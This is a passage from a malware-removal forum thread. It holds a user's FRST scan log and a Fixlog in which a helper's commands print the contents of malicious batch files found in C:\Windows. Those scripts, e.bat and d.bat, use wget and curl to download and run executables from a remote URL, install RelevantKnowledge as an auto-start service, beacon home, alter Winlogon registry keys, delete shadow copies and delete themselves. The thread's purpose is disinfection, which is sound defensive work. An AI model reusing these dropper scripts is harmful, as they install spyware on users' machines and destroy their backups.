FirewallRules: [{10CC44FD-3D7B-40D9-B4E9-C8B90B3CDA05}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{0F44D93E-8116-4C28-A09E-375525612959}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{DE2D1B1A-A95A-4427-8BD7-97016C528F99}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{023EC48C-AAA6-4832-8DEF-E77068991D61}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe No File
FirewallRules: [{A9B6A8FC-243F-45C5-B45E-B94CA201DFA7}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{59B2491E-5BF2-4DC5-AE8D-F34BD2AC1230}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{EF33A6D0-D34B-4630-9AE0-D5B6319C642D}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{0C8E4F25-226B-4BC9-BBD0-A6FDD1D99E01}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{E5EC7B01-738D-42B0-960C-4051ADBF6E85}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{28B9FA2D-E66B-453A-9DAB-DDB820A60893}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{2F79B4C8-3AFC-4E30-B1B2-EE4203877302}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{FEE98E1E-A352-4C6D-A55F-F641B4E69F55}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{A16DB9E7-288D-4E5B-BD58-5404E7DED756}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{986F830C-A0F0-4829-A1D3-6E209C9346FE}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9E97B312-F759-4491-9B4A-9A7F7BD66B49}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{3B74B220-3059-4A75-949E-50972E487A28}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{187F27A2-9AE2-489B-B927-B8FC03CC268B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{A9130200-545F-467A-9A36-1B798C073847}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{5DEA6D27-54CF-4606-949E-BD3C17E5B786}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [TCP Query User{DF58AEE1-F55F-4C53-ADDB-ACE482856AE1}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{872BEA53-323F-4801-81BF-7FFB853B9696}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8EB9B601-87D3-4318-8ED9-03D843F1590B}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{597233C9-A6EB-4645-8677-888825AFC9CE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{4077A009-74D8-44BE-AD00-C76EEF7EE5BD}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [{DAE1B584-4569-4BAB-B953-D64ABABDAAD5}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [TCP Query User{3B57E49F-50A7-468F-A210-D44AA14F7EE4}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [UDP Query User{13BD579F-4B71-49B9-9983-2D442B1932E8}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [{CF745F74-D653-4FD3-8D0D-19E40F7120AE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{AB407DB0-7E44-4FFA-A876-AC39F106ECB0}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{6D250D03-52C1-4019-980F-9AC5B16C218B}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [{79C5FF69-9C6C-4795-BBBF-8058548DF184}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C22CAF2C-8CE3-4B0E-B3E7-5A8C676B5F8E}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [UDP Query User{DCFA2E94-61CF-4517-A82F-AA51C00BB916}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [{9B9900F7-F341-4F67-A222-BA5ADB3D415F}] => (Block) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WShelper.exe No File
FirewallRules: [{C27B1110-1C16-4970-BA34-D7815EC04CD1}] => (Allow) c:\program files (x86)\opera\63.0.3368.107\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{5F4157A8-99BC-42D7-9E0B-83BC577FB74E}] => (Allow) c:\program files (x86)\opera\64.0.3417.92\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{E312F188-3203-4E00-8BD8-6B9B54F77B8A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 
==================== Restore Points =========================
 
16-11-2019 17:22:21 Removed Betternet for Windows 5.3.0.433
18-11-2019 19:29:54 Removed Nero 8. Available with Windows Installer version 1.2 and later.
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
Error: (11/18/2019 07:56:02 PM) (Source: MsiInstaller) (EventID: 1024) (User: Vladana-PC)
Description: Product: Adobe Acrobat Reader DC - Update 'Adobe Acrobat Reader DC
 (19.010.20098)' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft....k/?LinkId=23127
 
Error: (11/18/2019 07:55:56 PM) (Source: MsiInstaller) (EventID: 11722) (User: Vladana-PC)
Description: Product: Adobe Acrobat Reader DC -- Error 1722.There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action InstallWebResources, location: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe, command: 19.010.20098 18.011.20063.0
 
Error: (11/18/2019 07:39:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ZeroConfigService.exe, version: 15.1.1.2, time stamp: 0x4f8e1e73
Faulting module name: MurocApi.dll, version: 15.1.1.1, time stamp: 0x4f8e1ce7
Exception code: 0xc0000005
Fault offset: 0x000000000002be1b
Faulting process id: 0xdac
Faulting application start time: 0x01d59e3f79bc5d73
Faulting application path: C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
Faulting module path: C:\Program Files\Intel\WiFi\bin\MurocApi.dll
Report Id: c0d69ba9-0a32-11ea-9086-2cd44493347b
 
Error: (11/18/2019 07:29:29 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nero\Nero8\Nero Toolkit\DiscSpeed.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_fa62ad231704eab7.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd.manifest.
 
Error: (11/18/2019 07:29:29 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nero\Nero8\Nero Toolkit\DiscSpeed.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_fa62ad231704eab7.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd.manifest.
 
Error: (11/18/2019 06:33:18 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\TIS_Windows7PIM.dll".
Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/18/2019 06:30:28 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nero\Nero8\Nero Toolkit\DiscSpeed.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_fa62ad231704eab7.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd.manifest.
 
Error: (11/17/2019 06:59:21 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\TIS_Windows7PIM.dll".
Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
 
System errors:
=============
Error: (11/18/2019 08:45:07 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/18/2019 08:38:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Freemake Improver service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/18/2019 08:38:50 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Freemake Improver service to connect.
 
Error: (11/18/2019 07:44:42 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/18/2019 07:40:31 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel® PROSet/Wireless Zero Configuration Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (11/18/2019 07:39:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Freemake Improver service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/18/2019 07:39:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Freemake Improver service to connect.
 
Error: (11/18/2019 07:26:26 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
 
CodeIntegrity:
===================================
 
Date: 2019-11-18 20:54:53.563
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 20:42:30.056
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 20:26:08.897
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 20:19:42.211
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 20:11:42.317
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 19:50:11.629
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 19:42:57.810
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 15:51:54.319
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
==================== Memory info =========================== 
 
BIOS: FUJITSU // Phoenix Technologies Ltd. Version 1.08 10/02/2012
Motherboard: FUJITSU FJNBB29
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 97%
Total physical RAM: 3447.63 MB
Available physical RAM: 76.9 MB
Total Virtual: 6893.39 MB
Available Virtual: 2614.49 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:97.56 GB) (Free:19.07 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:368.1 GB) (Free:203.89 GB) NTFS
 
\\?\Volume{da4eedc3-7be1-11e2-8ac3-806e6f6e6963}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: EB90EB90)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=368.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt =======================

  • 0

#7
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

Not supposed to get the error.  I have reported it to Farber.

 

Looks like fixlist did not finish.  Let's see if a new one with fewer steps will work.

 


  • 0

#8
vladana_91

vladana_91

    Member

  • Topic Starter
  • Member
  • PipPip
  • 18 posts

This one worked!  =)  okay, so here are the copies you asked for...

 

Copy of Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (19-11-2019 01:41:53) Run:4
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CMD: dir C:\Windows\Wget
CMD: dir C:\Windows\Curl
CMD: type c:\windows\e.bat
CMD: type c:\windows\y.txt
CMD: type c:\windows\d.bat
CMD: type C:\Windows\mgr_n.reg
CMD: type  C:\Windows\mgr_f.reg
CMD: type  C:\Windows\e.reg
VirusTotal: C:\Windows\e.exe
VirusTotal: C:\Windows\d.exe
VirusTotal: C:\Windows\fr.exe
2019-11-17 00:17 - 2019-10-21 20:51 - 000002930 _____ C:\Windows\e.bat
2019-11-17 00:17 - 2019-07-30 17:00 - 000004608 _____ () C:\Windows\e.exe
2019-11-17 00:16 - 2019-09-12 17:27 - 000025600 _____ () C:\Windows\fr.exe
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\Wget
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\curl
2019-11-16 16:28 - 2019-10-12 19:40 - 000004608 _____ () C:\Windows\d.exe
2019-11-16 16:28 - 2019-09-12 15:16 - 000001241 _____ C:\Windows\d.bat
2019-11-16 16:28 - 2019-08-09 16:30 - 000000001 _____ C:\Windows\y.txt
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_n.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_f.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000290 _____ C:\Windows\e.reg
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{62634D95-960B-4834-8E71-A70408AD8FD9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EF076C91-DC9E-43E3-84ED-3D219E065A4F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.302\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll -> No File
ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
Reboot:
 
 
*****************
 
 
========= dir C:\Windows\Wget =========
 
 Volume in drive C has no label.
 Volume Serial Number is 7C43-366C
 
 Directory of C:\Windows\Wget
 
11/16/2019  04:28 PM    <DIR>          .
11/16/2019  04:28 PM    <DIR>          ..
11/16/2019  04:28 PM    <DIR>          bin
               0 File(s)              0 bytes
               3 Dir(s)  41,566,470,144 bytes free
 
========= End of CMD: =========
 
 
========= dir C:\Windows\Curl =========
 
 Volume in drive C has no label.
 Volume Serial Number is 7C43-366C
 
 Directory of C:\Windows\Curl
 
11/16/2019  04:28 PM    <DIR>          .
11/16/2019  04:28 PM    <DIR>          ..
08/21/2019  05:59 AM           596,992 curl.exe
               1 File(s)        596,992 bytes
               2 Dir(s)  41,566,470,144 bytes free
 
========= End of CMD: =========
 
 
========= type c:\windows\e.bat =========
 
@echo off 
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (
set "bits=32"
set "pdir=%ProgramFiles%"
) else (
set "bits=64"
set "pdir=%ProgramFiles(x86)%"
)
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 0 (
goto rk
) else (
exit
)
:rk
for /f "tokens=2*" %%a in ('reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%') do set "aid=%%b"
set /a "aid=%aid%"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlls.dll"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlls64.dll"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlservice.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg32.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg64.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg.exe"
if not exist "%pdir%\RelevantKnowledge\rlvknlg.exe" (
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlls.dll"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlls64.dll"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlservice.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg32.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg64.exe"
%windir%\Wget\bin\wget.exe -c -P "%pdir%\RelevantKnowledge" "%url%/rlvknlg.exe"
) else ( 
goto next
)
:next
if exist "%pdir%\RelevantKnowledge\rlvknlg.exe" (
) else (
exit
)
sc create RelevantKnowledge binPath= "%pdir%\RelevantKnowledge\rlservice.exe /service" DisplayName= RelevantKnowledge start= auto Error= ignore
timeout /t 35
sc start RelevantKnowledge
start /normal "" "%pdir%\RelevantKnowledge\rlvknlg.exe"
set n=0
:check
set /a n=n+1
if exist "%pdir%\RelevantKnowledge\readme.txt" (
goto finish
) else (
goto before_finish
)
:before_finish
timeout /t 5
if %n% neq 360 goto check
if not exist "%pdir%\RelevantKnowledge\readme.txt" %windir%\curl\curl.exe "http://db.softfire.i...%aid%&status=2"
:finish
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "0" /f /reg:%bits%
Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe" /f /reg:%bits%
del %windir%\mgr_f.reg
del %windir%\mgr_n.reg
del %windir%\e.exe
vssadmin delete shadows /all /quiet
del %0
========= End of CMD: =========
 
 
========= type c:\windows\y.txt =========
 
1
========= End of CMD: =========
 
 
========= type c:\windows\d.bat =========
 
@echo off 
::
::
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (set "bits=32") else set "bits=64"
regedit /s %windir%\mgr_f.reg
timeout /t 30
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe"
if exist "%windir%\fr.exe" (
goto start_fr
) else (
timeout /t 120
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/fr.exe"
if not exist "%windir%\fr.exe" exit
goto start_fr
)
:e
timeout /t 60
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat"
if exist "%windir%\e.bat" (
start %windir%\e.exe
) else (
timeout /t 120
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.exe"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "%url%/e.bat"
if not exist "%windir%\e.bat" exit
start %windir%\e.exe
)
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
if %ERRORLEVEL% EQU 0 (
regedit /s %windir%\e.reg
del %windir%\e.reg
del %windir%\fr.exe
del %windir%\d.exe
del %windir%\s.txt
del %0
) else (
regedit /s %windir%\mgr_n.reg
exit
)
:start_fr
Reg query "HKLM\SOFTWARE\Microsoft\flcact" /v "ActivateID" /reg:%bits%
